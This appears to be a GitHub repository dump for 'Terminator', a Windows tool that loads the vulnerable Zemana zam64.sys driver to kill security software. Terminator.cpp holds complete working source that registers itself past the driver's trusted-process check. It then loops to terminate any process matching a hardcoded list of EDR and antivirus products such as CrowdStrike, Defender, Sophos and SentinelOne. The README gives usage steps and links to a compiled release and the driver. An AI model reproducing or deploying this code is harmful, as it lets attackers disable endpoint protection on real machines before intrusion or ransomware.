├── .gitattributes
├── .gitignore
├── README.md
├── Terminator.sln
├── Terminator
├── Terminator.cpp
├── Terminator.vcxproj
└── Terminator.vcxproj.filters
└── vDriver
├── README.md
└── Terminator.sys
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is needed for earlier builds of msysgit that do not have it on by
10 | # default for C# files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Oo]ut/
33 | [Ll]og/
34 | [Ll]ogs/
35 |
36 | # Visual Studio 2015/2017 cache/options directory
37 | .vs/
38 | # Uncomment if you have tasks that create the project's static files in wwwroot
39 | #wwwroot/
40 |
41 | # Visual Studio 2017 auto generated files
42 | Generated\ Files/
43 |
44 | # MSTest test Results
45 | [Tt]est[Rr]esult*/
46 | [Bb]uild[Ll]og.*
47 |
48 | # NUnit
49 | *.VisualState.xml
50 | TestResult.xml
51 | nunit-*.xml
52 |
53 | # Build Results of an ATL Project
54 | [Dd]ebugPS/
55 | [Rr]eleasePS/
56 | dlldata.c
57 |
58 | # Benchmark Results
59 | BenchmarkDotNet.Artifacts/
60 |
61 | # .NET Core
62 | project.lock.json
63 | project.fragment.lock.json
64 | artifacts/
65 |
66 | # ASP.NET Scaffolding
67 | ScaffoldingReadMe.txt
68 |
69 | # StyleCop
70 | StyleCopReport.xml
71 |
72 | # Files built by Visual Studio
73 | *_i.c
74 | *_p.c
75 | *_h.h
76 | *.ilk
77 | *.meta
78 | *.obj
79 | *.iobj
80 | *.pch
81 | *.pdb
82 | *.ipdb
83 | *.pgc
84 | *.pgd
85 | *.rsp
86 | *.sbr
87 | *.tlb
88 | *.tli
89 | *.tlh
90 | *.tmp
91 | *.tmp_proj
92 | *_wpftmp.csproj
93 | *.log
94 | *.vspscc
95 | *.vssscc
96 | .builds
97 | *.pidb
98 | *.svclog
99 | *.scc
100 |
101 | # Chutzpah Test files
102 | _Chutzpah*
103 |
104 | # Visual C++ cache files
105 | ipch/
106 | *.aps
107 | *.ncb
108 | *.opendb
109 | *.opensdf
110 | *.sdf
111 | *.cachefile
112 | *.VC.db
113 | *.VC.VC.opendb
114 |
115 | # Visual Studio profiler
116 | *.psess
117 | *.vsp
118 | *.vspx
119 | *.sap
120 |
121 | # Visual Studio Trace Files
122 | *.e2e
123 |
124 | # TFS 2012 Local Workspace
125 | $tf/
126 |
127 | # Guidance Automation Toolkit
128 | *.gpState
129 |
130 | # ReSharper is a .NET coding add-in
131 | _ReSharper*/
132 | *.[Rr]e[Ss]harper
133 | *.DotSettings.user
134 |
135 | # TeamCity is a build add-in
136 | _TeamCity*
137 |
138 | # DotCover is a Code Coverage Tool
139 | *.dotCover
140 |
141 | # AxoCover is a Code Coverage Tool
142 | .axoCover/*
143 | !.axoCover/settings.json
144 |
145 | # Coverlet is a free, cross platform Code Coverage Tool
146 | coverage*.json
147 | coverage*.xml
148 | coverage*.info
149 |
150 | # Visual Studio code coverage results
151 | *.coverage
152 | *.coveragexml
153 |
154 | # NCrunch
155 | _NCrunch_*
156 | .*crunch*.local.xml
157 | nCrunchTemp_*
158 |
159 | # MightyMoose
160 | *.mm.*
161 | AutoTest.Net/
162 |
163 | # Web workbench (sass)
164 | .sass-cache/
165 |
166 | # Installshield output folder
167 | [Ee]xpress/
168 |
169 | # DocProject is a documentation generator add-in
170 | DocProject/buildhelp/
171 | DocProject/Help/*.HxT
172 | DocProject/Help/*.HxC
173 | DocProject/Help/*.hhc
174 | DocProject/Help/*.hhk
175 | DocProject/Help/*.hhp
176 | DocProject/Help/Html2
177 | DocProject/Help/html
178 |
179 | # Click-Once directory
180 | publish/
181 |
182 | # Publish Web Output
183 | *.[Pp]ublish.xml
184 | *.azurePubxml
185 | # Note: Comment the next line if you want to checkin your web deploy settings,
186 | # but database connection strings (with potential passwords) will be unencrypted
187 | *.pubxml
188 | *.publishproj
189 |
190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
191 | # checkin your Azure Web App publish settings, but sensitive information contained
192 | # in these scripts will be unencrypted
193 | PublishScripts/
194 |
195 | # NuGet Packages
196 | *.nupkg
197 | # NuGet Symbol Packages
198 | *.snupkg
199 | # The packages folder can be ignored because of Package Restore
200 | **/[Pp]ackages/*
201 | # except build/, which is used as an MSBuild target.
202 | !**/[Pp]ackages/build/
203 | # Uncomment if necessary however generally it will be regenerated when needed
204 | #!**/[Pp]ackages/repositories.config
205 | # NuGet v3's project.json files produce more ignorable files
206 | *.nuget.props
207 | *.nuget.targets
208 |
209 | # Microsoft Azure Build Output
210 | csx/
211 | *.build.csdef
212 |
213 | # Microsoft Azure Emulator
214 | ecf/
215 | rcf/
216 |
217 | # Windows Store app package directories and files
218 | AppPackages/
219 | BundleArtifacts/
220 | Package.StoreAssociation.xml
221 | _pkginfo.txt
222 | *.appx
223 | *.appxbundle
224 | *.appxupload
225 |
226 | # Visual Studio cache files
227 | # files ending in .cache can be ignored
228 | *.[Cc]ache
229 | # but keep track of directories ending in .cache
230 | !?*.[Cc]ache/
231 |
232 | # Others
233 | ClientBin/
234 | ~$*
235 | *~
236 | *.dbmdl
237 | *.dbproj.schemaview
238 | *.jfm
239 | *.pfx
240 | *.publishsettings
241 | orleans.codegen.cs
242 |
243 | # Including strong name files can present a security risk
244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
245 | #*.snk
246 |
247 | # Since there are multiple workflows, uncomment next line to ignore bower_components
248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
249 | #bower_components/
250 |
251 | # RIA/Silverlight projects
252 | Generated_Code/
253 |
254 | # Backup & report files from converting an old project file
255 | # to a newer Visual Studio version. Backup files are not needed,
256 | # because we have git ;-)
257 | _UpgradeReport_Files/
258 | Backup*/
259 | UpgradeLog*.XML
260 | UpgradeLog*.htm
261 | ServiceFabricBackup/
262 | *.rptproj.bak
263 |
264 | # SQL Server files
265 | *.mdf
266 | *.ldf
267 | *.ndf
268 |
269 | # Business Intelligence projects
270 | *.rdl.data
271 | *.bim.layout
272 | *.bim_*.settings
273 | *.rptproj.rsuser
274 | *- [Bb]ackup.rdl
275 | *- [Bb]ackup ([0-9]).rdl
276 | *- [Bb]ackup ([0-9][0-9]).rdl
277 |
278 | # Microsoft Fakes
279 | FakesAssemblies/
280 |
281 | # GhostDoc plugin setting file
282 | *.GhostDoc.xml
283 |
284 | # Node.js Tools for Visual Studio
285 | .ntvs_analysis.dat
286 | node_modules/
287 |
288 | # Visual Studio 6 build log
289 | *.plg
290 |
291 | # Visual Studio 6 workspace options file
292 | *.opt
293 |
294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
295 | *.vbw
296 |
297 | # Visual Studio LightSwitch build output
298 | **/*.HTMLClient/GeneratedArtifacts
299 | **/*.DesktopClient/GeneratedArtifacts
300 | **/*.DesktopClient/ModelManifest.xml
301 | **/*.Server/GeneratedArtifacts
302 | **/*.Server/ModelManifest.xml
303 | _Pvt_Extensions
304 |
305 | # Paket dependency manager
306 | .paket/paket.exe
307 | paket-files/
308 |
309 | # FAKE - F# Make
310 | .fake/
311 |
312 | # CodeRush personal settings
313 | .cr/personal
314 |
315 | # Python Tools for Visual Studio (PTVS)
316 | __pycache__/
317 | *.pyc
318 |
319 | # Cake - Uncomment if you are using it
320 | # tools/**
321 | # !tools/packages.config
322 |
323 | # Tabs Studio
324 | *.tss
325 |
326 | # Telerik's JustMock configuration file
327 | *.jmconfig
328 |
329 | # BizTalk build output
330 | *.btp.cs
331 | *.btm.cs
332 | *.odx.cs
333 | *.xsd.cs
334 |
335 | # OpenCover UI analysis results
336 | OpenCover/
337 |
338 | # Azure Stream Analytics local run output
339 | ASALocalRun/
340 |
341 | # MSBuild Binary and Structured Log
342 | *.binlog
343 |
344 | # NVidia Nsight GPU debugger configuration file
345 | *.nvuser
346 |
347 | # MFractors (Xamarin productivity tool) working folder
348 | .mfractor/
349 |
350 | # Local History for Visual Studio
351 | .localhistory/
352 |
353 | # BeatPulse healthcheck temp database
354 | healthchecksdb
355 |
356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
357 | MigrationBackup/
358 |
359 | # Ionide (cross platform F# VS Code tools) working folder
360 | .ionide/
361 |
362 | # Fody - auto-generated XML schema
363 | FodyWeavers.xsd
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | # Terminator
8 |
9 | * Reproduces the Spyboy technique, which terminates all EDR/XDR/AV processes by abusing the zam64.sys driver
10 | * Spyboy was selling the Terminator software for $3,000 ([more details](https://www.bleepingcomputer.com/news/security/terminator-antivirus-killer-is-a-vulnerable-windows-driver-in-disguise/))
11 | * The sample is sourced from [loldrivers](https://www.loldrivers.io/drivers/49920621-75d5-40fc-98b0-44f8fa486dcc/)
12 | # usage
13 |
14 | * the compiled version can be found [HERE](https://github.com/ZeroMemoryEx/Terminator/releases)
15 | * Place the driver `Terminator.sys` in the same path as the executable
16 | * run the program as an administrator
17 | * Keep the program running to prevent the Windows service from restarting the anti-malware products
18 |
19 | 
20 |
21 | # technical details
22 |
23 | * The driver contains a protection mechanism that only allows trusted process IDs to send IOCTLs. Without adding your process ID to the trusted list, you will receive an 'Access Denied' message every time. However, this can be easily bypassed by sending an IOCTL that adds our PID to the trusted list, which then permits us to issue numerous critical IOCTLs.
24 |
25 | 
26 |
--------------------------------------------------------------------------------
/Terminator.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.5.33530.505
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Terminator", "Terminator\Terminator.vcxproj", "{9A279A0B-357E-4FB7-AB1F-919CDF6619C1}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {9A279A0B-357E-4FB7-AB1F-919CDF6619C1}.Debug|x64.ActiveCfg = Debug|x64
17 | {9A279A0B-357E-4FB7-AB1F-919CDF6619C1}.Debug|x64.Build.0 = Debug|x64
18 | {9A279A0B-357E-4FB7-AB1F-919CDF6619C1}.Debug|x86.ActiveCfg = Debug|Win32
19 | {9A279A0B-357E-4FB7-AB1F-919CDF6619C1}.Debug|x86.Build.0 = Debug|Win32
20 | {9A279A0B-357E-4FB7-AB1F-919CDF6619C1}.Release|x64.ActiveCfg = Release|x64
21 | {9A279A0B-357E-4FB7-AB1F-919CDF6619C1}.Release|x64.Build.0 = Release|x64
22 | {9A279A0B-357E-4FB7-AB1F-919CDF6619C1}.Release|x86.ActiveCfg = Release|Win32
23 | {9A279A0B-357E-4FB7-AB1F-919CDF6619C1}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {F0897BA4-0B7F-45F9-B91B-595E6A4623FE}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/Terminator/Terminator.cpp:
--------------------------------------------------------------------------------
1 | #define _CRT_SECURE_NO_WARNINGS
2 | #include
3 | #include
4 | #include
5 |
6 | #define IOCTL_REGISTER_PROCESS 0x80002010
7 |
8 | #define IOCTL_TERMINATE_PROCESS 0x80002048
9 |
10 | const char* g_serviceName = "Terminator";
11 |
12 | const char* const g_edrlist[] = {
13 | "activeconsole", "anti malware", "anti-malware",
14 | "antimalware", "anti virus", "anti-virus",
15 | "antivirus", "appsense", "authtap",
16 | "avast", "avecto", "canary",
17 | "carbonblack", "carbon black", "cb.exe",
18 | "ciscoamp", "cisco amp", "countercept",
19 | "countertack", "cramtray", "crssvc",
20 | "crowdstrike", "csagent", "csfalcon",
21 | "csshell", "cybereason", "cyclorama",
22 | "cylance", "cyoptics", "cyupdate",
23 | "cyvera", "cyserver", "cytray",
24 | "darktrace", "defendpoint", "defender",
25 | "eectrl", "elastic", "endgame",
26 | "f-secure", "forcepoint", "fireeye",
27 | "groundling", "GRRservic", "inspector",
28 | "ivanti", "kaspersky", "lacuna",
29 | "logrhythm", "malware", "mandiant",
30 | "mcafee", "morphisec", "msascuil",
31 | "msmpeng", "nissrv", "omni",
32 | "omniagent", "osquery", "palo alto networks",
33 | "pgeposervice", "pgsystemtray", "privilegeguard",
34 | "procwall", "protectorservic", "qradar",
35 | "redcloak", "secureworks", "securityhealthservice",
36 | "semlaunchsv", "sentinel", "sepliveupdat",
37 | "sisidsservice", "sisipsservice", "sisipsutil",
38 | "smc.exe", "smcgui", "snac64",
39 | "sophos", "splunk", "srtsp",
40 | "symantec", "symcorpu", "symefasi",
41 | "sysinternal", "sysmon", "tanium",
42 | "tda.exe", "tdawork", "tpython",
43 | "vectra", "wincollect", "windowssensor",
44 | "wireshark", "threat", "xagt.exe",
45 | "xagtnotif.exe" ,"mssense" };
46 |
47 | int g_edrlistSize = sizeof(g_edrlist) / sizeof(g_edrlist[0]);
48 |
49 | BOOL loadDriver(char* driverPath) {
50 | SC_HANDLE hSCM, hService;
51 |
52 | // Open a handle to the SCM database
53 | hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
54 | if (hSCM == NULL)
55 | return (1);
56 |
57 | // Check if the service already exists
58 | hService = OpenServiceA(hSCM, g_serviceName, SERVICE_ALL_ACCESS);
59 | if (hService != NULL) {
60 | printf("Service already exists.\n");
61 |
62 | // Start the service if it"s not running
63 | SERVICE_STATUS serviceStatus;
64 | if (!QueryServiceStatus(hService, &serviceStatus)) {
65 | CloseServiceHandle(hService);
66 | CloseServiceHandle(hSCM);
67 | return (1);
68 | }
69 |
70 | if (serviceStatus.dwCurrentState == SERVICE_STOPPED) {
71 | if (!StartServiceA(hService, 0, nullptr)) {
72 | CloseServiceHandle(hService);
73 | CloseServiceHandle(hSCM);
74 | return (1);
75 | }
76 |
77 | printf("Starting service...\n");
78 | }
79 |
80 | CloseServiceHandle(hService);
81 | CloseServiceHandle(hSCM);
82 | return (0);
83 | }
84 |
85 | // Create the service
86 | hService = CreateServiceA(hSCM, g_serviceName, g_serviceName, SERVICE_ALL_ACCESS,
87 | SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START,
88 | SERVICE_ERROR_IGNORE, driverPath, NULL, NULL, NULL,
89 | NULL, NULL);
90 |
91 | if (hService == NULL) {
92 | CloseServiceHandle(hSCM);
93 | return (1);
94 | }
95 |
96 | printf("Service created successfully.\n");
97 |
98 | // Start the service
99 | if (!StartServiceA(hService, 0, nullptr)) {
100 | CloseServiceHandle(hService);
101 | CloseServiceHandle(hSCM);
102 | return (1);
103 | }
104 |
105 | printf("Starting service...\n");
106 |
107 | CloseServiceHandle(hService);
108 | CloseServiceHandle(hSCM);
109 |
110 | return (0);
111 | }
112 |
113 | char* toLowercase(const char* str) {
114 | char* lower_str = _strdup(str);
115 | for (int i = 0; lower_str[i]; i++) {
116 | lower_str[i] = tolower((unsigned char)lower_str[i]);
117 | }
118 | return lower_str;
119 | }
120 |
121 | int isInEdrlist(const char* pn) {
122 | char* tempv = toLowercase(pn);
123 | for (int i = 0; i < g_edrlistSize; i++) {
124 | if (strstr(tempv, g_edrlist[i]) != NULL) {
125 | free(tempv);
126 | return (1);
127 | }
128 | }
129 | free(tempv);
130 | return (0);
131 | }
132 |
133 | DWORD
134 | checkEDRProcesses(HANDLE hDevice) {
135 | unsigned int procId = 0;
136 | unsigned int pOutbuff = 0;
137 | DWORD bytesRet = 0;
138 | int ecount = 0;
139 | HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
140 |
141 | if (hSnap != INVALID_HANDLE_VALUE) {
142 | PROCESSENTRY32 pE;
143 | pE.dwSize = sizeof(pE);
144 |
145 | if (Process32First(hSnap, &pE)) {
146 | do {
147 | char exeName[MAX_PATH];
148 | wcstombs(exeName, pE.szExeFile, MAX_PATH);
149 |
150 | if (isInEdrlist(exeName)) {
151 | procId = (unsigned int)pE.th32ProcessID;
152 | if (!DeviceIoControl(hDevice, IOCTL_TERMINATE_PROCESS, &procId,
153 | sizeof(procId), &pOutbuff, sizeof(pOutbuff),
154 | &bytesRet, NULL))
155 | printf("faild to terminate %ws !!\n", pE.szExeFile);
156 | else {
157 | printf("terminated %ws\n", pE.szExeFile);
158 | ecount++;
159 | }
160 | }
161 | } while (Process32Next(hSnap, &pE));
162 | }
163 | CloseHandle(hSnap);
164 | }
165 | return (ecount);
166 | }
167 |
168 | int main(void) {
169 | WIN32_FIND_DATAA fileData;
170 | HANDLE hFind;
171 | char FullDriverPath[MAX_PATH];
172 | BOOL once = 1;
173 |
174 | hFind = FindFirstFileA("Terminator.sys", &fileData);
175 |
176 | if (hFind != INVALID_HANDLE_VALUE) { // file is found
177 | if (GetFullPathNameA(fileData.cFileName, MAX_PATH, FullDriverPath, NULL) !=
178 | 0) { // full path is found
179 | printf("driver path: %s\n", FullDriverPath);
180 | }
181 | else {
182 | printf("path not found !!\n");
183 | return (-1);
184 | }
185 | }
186 | else {
187 | printf("driver not found !!\n");
188 | return (-1);
189 | }
190 | printf("Loading %s driver .. \n", fileData.cFileName);
191 |
192 | if (loadDriver(FullDriverPath)) {
193 | printf("faild to load driver ,try to run the program as administrator!!\n");
194 | return (-1);
195 | }
196 |
197 | printf("driver loaded successfully !!\n");
198 |
199 | HANDLE hDevice =
200 | CreateFile(L"\\\\.\\ZemanaAntiMalware", GENERIC_WRITE | GENERIC_READ, 0,
201 | NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
202 |
203 | if (hDevice == INVALID_HANDLE_VALUE) {
204 | printf("Failed to open handle to driver !! ");
205 | return (-1);
206 | }
207 |
208 | unsigned int input = GetCurrentProcessId();
209 |
210 | if (!DeviceIoControl(hDevice, IOCTL_REGISTER_PROCESS, &input, sizeof(input),
211 | NULL, 0, NULL, NULL)) {
212 | printf("Failed to register the process in the trusted list %X !!\n",
213 | IOCTL_REGISTER_PROCESS);
214 | CloseHandle(hDevice);
215 | return (-1);
216 | }
217 |
218 | printf("process registed in the trusted list %X !!\n",
219 | IOCTL_REGISTER_PROCESS);
220 |
221 | printf(
222 | "Terminating ALL EDR/XDR/AVs ..\nkeep the program running to prevent "
223 | "windows service from restarting them\n");
224 |
225 | for (;;) {
226 | if (!checkEDRProcesses(hDevice))
227 | Sleep(1200);
228 | else
229 | Sleep(700);
230 | }
231 |
232 | system("pause");
233 |
234 | CloseHandle(hDevice);
235 |
236 | return 0;
237 | }
238 |
--------------------------------------------------------------------------------
/Terminator/Terminator.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {9a279a0b-357e-4fb7-ab1f-919cdf6619c1}
25 | Terminator
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | true
77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
78 | true
79 |
80 |
81 | Console
82 | true
83 |
84 |
85 |
86 |
87 | Level3
88 | true
89 | true
90 | true
91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 | true
93 |
94 |
95 | Console
96 | true
97 | true
98 | true
99 |
100 |
101 |
102 |
103 | Level3
104 | true
105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
106 | true
107 | MultiThreadedDebug
108 |
109 |
110 | Console
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 | true
118 | true
119 | true
120 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
121 | true
122 |
123 |
124 | Console
125 | true
126 | true
127 | true
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
--------------------------------------------------------------------------------
/Terminator/Terminator.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/vDriver/README.md:
--------------------------------------------------------------------------------
1 |
2 | * Place the driver in the same directory as the executable, and run the executable as an administrator.
3 |
--------------------------------------------------------------------------------
/vDriver/Terminator.sys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZeroMemoryEx/Terminator/a844482c947f29c345c3bfd333958d09bdd789fc/vDriver/Terminator.sys
--------------------------------------------------------------------------------